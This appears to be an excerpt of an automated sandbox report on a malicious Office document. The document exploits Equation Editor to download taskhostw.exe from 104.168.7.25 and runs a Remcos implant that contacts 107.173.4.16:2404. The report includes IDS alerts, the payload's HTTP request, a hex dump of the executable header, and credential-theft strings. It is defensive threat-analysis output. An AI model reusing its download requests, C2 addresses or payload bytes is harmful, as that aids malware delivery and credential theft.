Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 104.168.7.25:80 -> 192.168.2.22:49161
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 104.168.7.25:80 -> 192.168.2.22:49161
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 107.173.4.16:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49162 -> 107.173.4.16:2404

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.173.4.16 2404	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 107.173.4.16

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_00683F21

Source: global traffic

TCP traffic: 192.168.2.22:49162 -> 107.173.4.16:2404

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 05:28:58 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 12 Oct 2024 07:42:35 GMTETag: "13b200-62442bf48212e"Accept-Ranges: bytesContent-Length: 1290752Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 14 00 00 04 00 00 0e 4e 14 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 3c 28 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 13 00 30 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e dd 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3c 28 07 00 00 70 0c 00 00 2a 07 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 30 71 00 00 00 a0 13 00 00 72 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 107.173.4.16 107.173.4.16
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49163 -> 178.237.33.50:80

Source: global traffic

HTTP traffic detected: GET /350/taskhostw.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_00683F21

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7D5F291B-FC4E-4817-A29C-C6E550DE4245}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /350/taskhostw.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: bhv41C2.tmp.9.dr	String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: svchost.exe, 00000009.00000003.378959350.00000000002BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Vs://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.facebook.com (Facebook)
Source: svchost.exe, 00000009.00000003.378959350.00000000002BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Vs://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.yahoo.com (Yahoo)
